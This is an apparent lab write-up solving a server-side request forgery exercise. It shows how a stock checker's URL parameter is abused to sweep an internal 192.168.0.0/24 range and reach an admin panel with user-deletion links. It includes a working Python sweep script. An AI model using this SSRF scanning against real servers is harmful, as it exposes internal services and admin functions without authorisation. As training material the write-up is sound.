# Lab: Basic SSRF against another back-end system

The main web page:

<figure><img src="https://251574581-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlTgE7hbyi7mSyXsMcq44%2Fuploads%2Fpd0QX9sn4Va9wekDrQ9B%2Fimage.png?alt=media&#x26;token=a4ce06a4-c6b8-426c-aaba-5bd61eecaa52" alt=""><figcaption></figcaption></figure>

It has a stock checker feature:

<figure><img src="https://251574581-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlTgE7hbyi7mSyXsMcq44%2Fuploads%2FeNFBVpbnee2TyHt0hAHZ%2Fimage.png?alt=media&#x26;token=a4a78f8a-38e2-4004-8496-73d0fbb81f32" alt=""><figcaption></figcaption></figure>

If you test it, you will see that it sends a POST request whose stockAPI parameter carries a full URL that the back end fetches on your behalf. That is the SSRF primitive: whatever URL you put in that parameter is requested from the server's network position, not from your browser.

<figure><img src="https://251574581-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlTgE7hbyi7mSyXsMcq44%2Fuploads%2FoVjDxOXoAKFDCSW5SkJ7%2Fimage.png?alt=media&#x26;token=f3f4205b-cbc8-491c-b3b3-9bb10f94f64c" alt=""><figcaption></figcaption></figure>

Change it to 192.168.0.X:8080 as the exercise statement says and sweep the range to see which hosts answer.\
Only the access point (.1) returns a 200 and .34 returns a 404; every other address comes back as an HTTP 500 internal server error, which here means the back end could not connect to that host at all.

<figure><img src="https://251574581-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlTgE7hbyi7mSyXsMcq44%2Fuploads%2FtFiCioWrdiBQF4429kY7%2Fimage.png?alt=media&#x26;token=a6c4cf2b-d577-4999-8d13-a3281aeb39bc" alt=""><figcaption></figcaption></figure>
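The sweep above can be done with Burp Intruder, but it is also a few lines of scripting. The block below is an added example, not code from the lab or the original page. It assumes a lab URL placeholder (`YOUR-LAB-ID`), the endpoint path `/product/stock`, the parameter name `stockApi` and the admin path `/admin`; only the 192.168.0.X:8080 target and the 200/404/500 meanings come from the write-up. The sweep takes the sender as a parameter, so the same logic can be driven by a fake sender offline or by the real HTTP sender against the lab.

```python
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, Tuple

# Assumptions (not taken from the lab page): lab host, endpoint path,
# exact parameter casing and the path of the admin interface.
LAB_URL = "https://YOUR-LAB-ID.web-security-academy.net/product/stock"
PARAM = "stockApi"
ADMIN_PATH = "/admin"
PORT = 8080


def build_payload(host_octet: int) -> str:
    """Internal URL the vulnerable back end will be asked to fetch."""
    return f"http://192.168.0.{host_octet}:{PORT}{ADMIN_PATH}"


def classify(status: int) -> str:
    """Meaning of the status code the front end relays back to us."""
    if status == 200:
        return "admin interface reachable"
    if status == 404:
        return "host up, path not found"
    if status == 500:
        return "no response from host (connection failed or timed out)"
    return f"unexpected ({status})"


def send_via_ssrf(internal_url: str) -> int:
    """Real sender: POST the parameter to the lab and return the HTTP status."""
    data = urllib.parse.urlencode({PARAM: internal_url}).encode()
    req = urllib.request.Request(LAB_URL, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        # 404/500 from the lab arrive as exceptions; the code is what we want
        return e.code


def sweep(send: Callable[[str], int],
          octets: Iterable[int] = range(1, 255)) -> Dict[int, Tuple[int, str]]:
    """Try every host in 192.168.0.0/24 on port 8080 and record the outcome."""
    results: Dict[int, Tuple[int, str]] = {}
    for octet in octets:
        status = send(build_payload(octet))
        results[octet] = (status, classify(status))
    return results


def interesting(results: Dict[int, Tuple[int, str]]) -> Dict[int, Tuple[int, str]]:
    """Hosts that actually answered, i.e. anything other than a 500."""
    return {o: r for o, r in results.items() if r[0] != 500}


if __name__ == "__main__":
    # Against the real lab; swap send_via_ssrf for a fake sender to dry-run.
    for octet, (status, meaning) in interesting(sweep(send_via_ssrf)).items():
        print(f"192.168.0.{octet}:{PORT} -> {status} ({meaning})")
```

Filtering on "anything but 500" rather than "only 200" matters: a 404 still proves the host is listening on 8080, which is the difference between a dead address and a live service whose admin path you have not found yet.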

Requesting the admin panel through the same parameter, we can see both users and the option to delete them. The links on that page point at the internal host, so any action on it also has to be submitted as a URL through the stockAPI parameter rather than opened in the browser.

<figure><img src="https://251574581-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlTgE7hbyi7mSyXsMcq44%2Fuploads%2FaN2PITIhejMDgWahPJxT%2Fimage.png?alt=media&#x26;token=6333bfc8-fdf9-49b2-8a08-2f0511e936ef" alt=""><figcaption></figcaption></figure>
